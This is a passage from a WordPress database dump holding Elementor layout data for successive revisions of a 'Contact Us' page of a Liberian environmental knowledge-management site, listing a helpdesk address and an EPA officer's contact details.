"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong>\\n\\nMEAs Officer\\n\\nFocal Point of the United Nations Convention on Biological Diversity\\n<br>\\n<a href=\\\"jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14659,2325,'_elementor_edit_mode','builder'),(14660,2325,'_elementor_template_type','wp-page'),(14661,2325,'_elementor_version','2.7.5'),(14662,2325,'_wp_page_template','default'),(14663,2325,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong>\\n\\nMEAs Officer\\n\\nFocal Point of the United Nations Convention on Biological Diversity\\n<br>\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14666,2326,'_elementor_edit_mode','builder'),(14667,2326,'_elementor_template_type','wp-page'),(14668,2326,'_elementor_version','2.7.5'),(14669,2326,'_wp_page_template','default'),(14670,2326,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong>\\n<br>\\nMEAs Officer\\n<br>\\nFocal Point of the United Nations Convention on Biological Diversity\\n<br>\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14674,2327,'_elementor_edit_mode','builder'),(14675,2327,'_elementor_template_type','wp-page'),(14676,2327,'_elementor_version','2.7.5'),(14677,2327,'_wp_page_template','default'),(14678,2327,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 